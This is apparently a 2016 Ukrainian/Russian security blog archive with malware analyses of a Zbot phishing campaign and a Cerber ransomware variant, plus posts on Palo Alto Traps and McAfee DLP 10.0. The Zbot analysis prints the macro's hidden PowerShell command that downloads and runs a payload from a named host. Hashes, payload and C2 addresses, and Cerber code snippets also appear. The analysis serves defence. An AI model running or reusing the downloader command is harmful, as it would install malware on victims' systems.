Archive | July 2016

Увага! Zbot, чергова хвиля розсилки

Позов_примірник, Угоду_про_видачу_безготівкового, Договір_займу

macro

Вчора близько 15-ї години відбувалася масова розсилка нової модифікації Zbot (ZeuS). З ним ми уже стикалися раніше.

Цього разу фішингові листи містили начеб-то інформацію про непогашений кредит від відомих українських банків:msg2

msg1

І хоча відсутність підписів у корпоративному стилі (!), а головне – скриньки із домену @t-online.de (які не мають відношення до банків) мають насторожити обережного користувача, варто припустити, що частину людей могли ввести в оману. Не важко здогадатися, що не дивлячись на різний зміст листів та різні адреси, начинка документу була однакова. Але про все по порядку:

1)Маркери компрометації:

Received: from mailout09.t-online.de (194.25.134.84) / Received: from mailout05.t-online.de (194.25.134.82)

Документ SHA256=9b4266b05f072a270457198f7212cac0a8fce1ac30d501f214b2a38f20ba6317

dropper SHA256=ba4fe9d9c3138f9ea2caf0d628b0334447d93f301d916f5fdb62dabc115bec5f

payload завантажується звідси hххp://elfaroconsultants.com/safari/content.bin

Типово. що на момент розсилки файли мали дуже низький рейт згідно VirusTotal:

vt2 vt1

oletools красномовно застерігають від необачних кроків:

Screenshot_2016-07-14_16-09-25

2)Механізм активації та компрометації системи:

Якщо жертва відкрила приєднання, то на неї чекатиме прохання активувати макроси. macro2

Так, перед нами уже знайомий тип оболонки – це W97M/Downloader, який містить макрос, що передає інструкції на PowerShell. На відміну від Cerber, приманка якого використовувала base64 обфускацію команд,в даному випадку зловмисники вирішили не витрачати на це часу, тож ми можемо одразу побачити

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();
(New-Object System.Net.WebClient).DownloadFile(‘hххp://elfaroconsultants.com/safari/content.bin’, $f);(New-Object -com WScript.Shell).Exec($f)

Потрібно зазначити іще одну відмінність – запуск коду прив’язаний не до активації макросу, а до закриття файлу. Це новий елемент, раніше мені таке не траплялося.

Отже макрос змушує PowerShell ініціювати завантаження файлу:

netwrk

Завантажений payload зберігається у каталозі %tmp% із довільним іменем і запускається на виконання:

autorun

Після певної затримки payload копіює свої тельбухи у AppData\Locla\ , реєструє себе на автозавантаження та інжектує explorer.exe

inj2

recovery

trapsDLL

За рахунок останнього відбувається самовідновлення файлів вірусу при спробі видалити його елементи із AppData\Local . Не обійшлося і без фірмової “фішки” zbot – при відновленні він генерує новий файл із новим іменем та іншою контрольною сумою.

Продовження аналізу буде трохи згодом.

3) Проміжні висновки

  • Вони (зловмисники) починають приділяти увагу змісту. Варто очікувати нових ідей стосовно боргів/кредитів і таке інше.
  • Звертайте увагу на оформлення листів – які б важливі речі в них не писали, підробку можна відрізнити по оформленню та адресам.
  • Поєднання W97M.downloader + powershell зараз в тренді тому контролюйте мережеву активність даного компоненту.
  • Початкова фаза активації проходить через %temp% проте без .exe
  • Блокувати запуск із %appdata% як раніше потрібно, але в даному випадку вже трохи запізно
  • Для нормального захисту потрібно або вирізати макроси на рівні поштового серверу/шлюзу, або ж застосовувати на кінцевих точках альтернативний захист (не антивірус)
  • Варто готуватися до більш складного та витонченого обману. Ми бачимо, що зловмисники витратили час на підготовку. Наступного разу вони змінять адреси, скопіюють оформлення листів і вже більше людей “на автоматі” відкриють приєднання – питання лише в тому, чи буде активовано макроси (чи там буде щось інше)? Не розслабляйтеся і пам’ятайте, що безпека ваших систем і даних залежить від вас самих.

Будьте уважними та обережними при роботі з ІТ, особливо при роботі з електронними листами.

— Не было количества, вот ведь в чём дело. Одно лишь качество переменилось вдруг. Радикально. В одночасье. Как взрыв.

MV5BMTk1NTc2NjYxNF5BMl5BanBnXkFtZTcwNzA0Njg0Mw@@._V1_SX640_SY720_

VR

Palo Alto Traps vs новые семплы

Вчера (14/07/16) провел первый вебинар по решению Palo Alto Networks Traps.
В процессе были рассмотрены типичные техники работы актуальных образцов ransomware, RAT.
Для тестирования защиты помимо семплов использовал metasploit-framework, msfvenom и veil-evasion.

Примечательно, что практически сразу после вебинара получил новый образец. Сразу решил проверить на нем Traps.
Результат превзошел мои ожидания – даже с выключенным WilFire, отключенными запретами вирусных техник Traps продолжал сопротивляться и не давал семплу инжектировать себя в системные процессы:

macro2Первый запуск – вся защита активирована. Сработала блокировка дочерних процессов.

trapsВторой запуск – отключен запрет на дочерние процессы и на запуск из %tmp%, %appdata%. Сработал WildFire.

DLLТретий запуск – защита от вирусов и WildFire отключен(!). Сработал блок инжекта.

Что такое Palo Alto Traps и как он защищает:


Для тех. кому slideshare неудобен публикую презентацию отдельным файлом pdf (2,5 Мб)
Контент презентации рассчитан на сотрудников ИТ/ИБ подразделений.

Видеозапись вебинара с живой демонстрацией:

Будьте осторожны при использовании высоких технологий.

VR

Вышел McAfee DLP 10.0

dlp10

– Слишком много? – переспросил Румата.
– Мне не знакомо это  слово  – “слишком”.

6-го июля состоялся релиз 10-й версии модуля DLP Endpoint. На первый взгляд может показаться, что новая версия практически не отличается от 9.4, однако как известно “дьявол кроется в мелочах“. Само-собой таких глобальных изменений как в прошлом году (переход 9.3 -> 9.4) не ожидалось, однако разработчики нашли способ удивить, а местами порадовать заказчиков. Давайте обо всем по порядку:

1. Классификация

manual classification

Функционал меток (tag) был расширен за счет предоставления возможности классификации содержимого документа самим сотрудникам компании т.н. Manual Classification. Т.е. кроме автоматических правил назначения меток по определенным условиям (см. слайды 32-33 моей презентации), теперь можно дать право отдельной группе сотрудников классифицировать содержимое документов в ручном режиме. Раньше такая задача решалась с помощью привлечения модуля классификации TITUS, а теперь это можно реализовать встроенными средствами. Для приложений MS Office данная функция реализована через подключаемый модуль (пример на снимке экрана выше), для других поддерживаемых файлов классификация в ручном режиме осуществляется через контекстное меню.

ePO_classification

Между автоматической классификацией и классификацией вручную есть разница. Если файл получает свою метку по автоматическому правилу (Appplication/Location/Web), то DLP агент проверят сопоставление метки каждый раз, когда регистрирует обращение к файлу. Когда сотрудник осуществляет классификацию документа/письма DLP агент встраивает маркер в сам файл, а к электронному письму добавляется x-header. Встраиваемые маркеры, которые добавляются к файлам при ручной классификации позволяют подключать сторонние решения для отслеживания документов помеченных с помощью McAfee DLP Endpoint.

От себя добавлю, что функция реально полезная и удобная, т.к. теперь заказчикам не нужно идти на компромисс и “светить” пользователям метки через диалог назначения. Метки по прежнему остаются удобным методом автоматической классификации информации в тех случаях, когда есть возможность описать источник генерации файла. А для тех документов, которые создают сами пользователи можно применять Manual Classification. Более того, можно активировать режим принудительной классификации, т.е. при сохранение документа пользователь должен будет обязательно указать к какой категории он относиться:

force_classificationforce_classification2

2. Функционал

Первое на что обратят внимание опытные заказчики/пользователи McAfee DLP – установка либо обновление до 10-й версии теперь не требуют перезагрузки операционной системы. Да, это действительно работает и правила защиты активируются сразу. Однако стоит помнить, что изменение конфигурации уже развернутых клиентов по части активации/деактивации определенных модулей-перехватчиков может потребовать перезагрузки.

Изменения коснулись операций поиска конфиденциальной информации (т.н. Endpoint Discovery) – теперь пользователю можно дать право запускать сканирование и выполнять действия согласно политикам:

DLP_discovery_user

Из прочих изменений стоит выделить поддержку 64-х битных версий Firefox, поддержку Device Guard для Windows 10, интеграцию с AD RMS Client 2.1 и расширенную настройку Web Protection по инспекции запросов браузера:

Web Protection

Так же был существенно расширен функционал DLP Endpoint для Mac OS. Как могут помнить опытные пользователи, долгое время версия для фанатов творчества уважаемого мной Стива Джобса, ограничивалась только возможностью мониторинга/блокировки внешних накопителей. Наконец-то разработчики обратили свое внимание на владельцев MacBook и добавили следующие правила:

  • Removable Storage Protection;
  • Network Share Protection;
  • Application File Access Protection.

Фактически, операторы DLP Endpoint получили возможность отслеживать/блокировать документы, которые пользователь копирует с Mac OS на USB носители; возможность отслеживать/запрашивать обоснование при операциях на сетевых ресурсах и последнее по списку, но не по значению – возможность блокировать доступ запущенных приложений Apple к документам, которые помечены как конфиденциальные. А если учесть, что версия DLP Endpoint для Mac понимает классификацию, которая была определена в ручном режиме на Windows системах получается очень не плохо. Это не большой шаг, но по сравнению с 9.4 заказчики получают больше возможностей контролировать как их сотрудники распоряжаются информацией на Mac OS устройствах.

Также для правил защиты на Mac OS появилась возможность использовать исключения для устройств/пользователей, а также выбирать разный тип реакции на инцидент в зависимости от сетевого подключения (Online/Offline/VPN).

3. Интерфейс

Был внесен ряд изменений как в работу с политиками так и по части обработки инцидентов. Из основных стоит отметить такие:

  • настройки клиента для Windows и Mac OS были разнесены;
  • правила, которые поддерживаются и для Win и Mac получили выборочную активацию;
  • набор разрешений теперь позволяет контролировать к настройкам какой группы правил будет иметь тот или иной пользователь еРО;
  • возможность экспорта списка инцидентов вместе с теневыми копиями..

permission_setspoliciesrule_usb1# # #

Предварительные впечатления от новой версии весьма положительные. Улучшения механизмов классификации, расширение функционала на Mac OS и упрощение рутинных операций явно не оставят заказчиков безразличными. В следующей публикации я постараюсь рассмотреть особенности использования DLP Endpoint совместно с FRP и DLP Discover.

Более детально нововведения описаны в заметках к релизу (PD26582).

Будьте осторожны при использовании высоких технологий. Обращайтесь к нам чтобы защитить свои цифровые активы.

Vladislav Radetskiy | Technical Lead | BAKOTECH GROUP

Цербер який шифрує файли

cerber_pageНовий варіант Cerber Ransomware потрапив мені до рук. Минулого разу я помилково прийняв його за Dridex. Перші зразки Cerber були помічені ще на початку березня. Аналітики відносять його до так званого Ransomware as a Service (RaaS), тобто охочі заробити розповсюджують заразу, а самі автори отримують комісію з кожної транзакції. Механіка роботи наступна – при активації певний перелік файлів шифрується за допомогою алгоритму AES, жертві пропонують сплатити ~ 1,2 BTC ($500) за відновлення доступу до інформації. Через 7 днів сума викупу зростає вдвічі. Сплата проходить через ресурс що розміщений в мережі Tor.

Від інших представників ransomware Цербера відрізняє застосування вбудованого диктора (після шифрування файлів жертві голосом озвучують факт шифрування):

Set SAPI = CreateObject(“SAPI.SpVoice”)
SAPI.Speak “Attention! Attention! Attention!”
For i = 1 to 5
SAPI.Speak “Your documents, photos, databases and other important files have been encrypted!”
Next

Та вибіркову цілеспрямованість. Шифрування не відбувається, якщо скомпрометована система знаходиться у одній з наступних країн:

“blacklist”: {
“countries”: [
“am”, “az”, “by”, “ge”, “kg”, “kz”, “md”, “ru”, “tm”, “tj”, “ua”, “uz”

Саме через цю перевірку я так і не побачив фінальної дії семплу, хоч запускав його по кілька разів на різних системах. Крім того, як можна помітити із першого знімку екрану, автори полюбляють вислів “Quod me non necat me fortiorem facit” що у перекладі з латинської означає “Все у житті, що мене не вбиває, робить мене сильнішим” (Ніцше).

Отже нова версія Cerber має кілька відмінностей:

  • цього разу без PowerShell;
  • його прислали особисто мені;
  • обгортка – файл шаблону (.dotm);
  • інакший зміст UDP пакету.

Давайте розглянемо активність семплу детальніше. Усе починається із фішингового листа:

0_mailІнвойс? Мені? Вау.. Ну давайте поглянемо що в середині:

0dotm_ole_1 0dotm_ole_2При відкритті документу – автозапуск макроса. Сама приманка має наступний вигляд:

0_macroЯкщо жертва активувала макрос, в каталог %AppData% записується .vbs із довільним цифровим іменем, який обробляється системним процесом wscript.exe котрий ініціює з’єднання з файловим сервером з якого уже завантажується основний модуль:

7 8Цікаво, що від активації до завантаження файлів іде затримка 3-4 хвилини. Основний модуль та додаткові файли записуються в %AppData% і керування передається спершу .tmp файлу із довільним цифровим іменем, а вже потім .tmp копіює себе у підкаталог %AppData%\{X-Y-Z-A-AAA}\*.exe :

10Сам Cerber (у даному випадку процес cipher.exe) ініціює розсилку UDP пакетів на діапазони ІР, що належать провайдерам РФ та Германії:udpНа цій стадії семпл ініціював самознищення і видаляв активний компонент (.exe файл). Сам процес шифрування детально розглянутий за посиланням.

# # # # #

Давайте зосередимося на головних моментах:

  1. Написано досить якісно, значить цикл життя таких семплів буде довгим;
  2. Cerber використовує json конфіг файл, що дозволяє швидко адаптувати його до нових умов;
  3. Обгортки можуть відрізнятися, проте сам модуль пишеться і стартує із %AppData%

Для того, щоб захиститися від нових різновидів Цербера та його друзів рекомендую жорсткіше фільтрувати пошту (вирізати макроси із документів) та блокувати створення і запуск .exe із %AppData% – це технічні моменти. Що стосується організаційних, то поради проводити періодичні співбесіди із працівниками та тести на проникнення залишаються в силі.

Іще одне – основна проблема із сучасним фішингом та семплами у тому, що на момент розсилки, вони майже не детектуются звичайними АВ-сканерами. Це підштовхує до застосування пісочниць, або до жорсткого контролю поведінки запущених користувачем процесів на рівні кінцевої точки. Чому так? Погляньте на результати перевірки документу-обгортки та самого payload на момент контакту:

vt_payload_contact vt_dropp_contact

Варіант захисту для користувачів VSE

VSE_AP_appdataВаріант захисту для користувачів Traps (Palo Alto Networks)

traps_rest2 traps_rest1

macro2 powershell

Маркери компрометації:

z43n21v1gs8e2p.dotm SHA1=0a03d6e9b6730a40d922b38b51a7f2344b09cc37

pentnt.exe SHA1=c8f3f0a33efe38e9296ef79552c4cadf6cf0bde6

сервер з якого завантажується payload по 80 TCP = 37.187.37.150

розсилка пакетів “hi005e974” по 6892 UDP = 85.93.0.x

Будьте уважними та обережними при роботі з ІТ.

Будущее — это тщательно обезвреженное настоящее

MV5BMTk3ODUxMjAwNV5BMl5BanBnXkFtZTcwNTg2ODY4Mg@@._V1_SX640_SY720_VR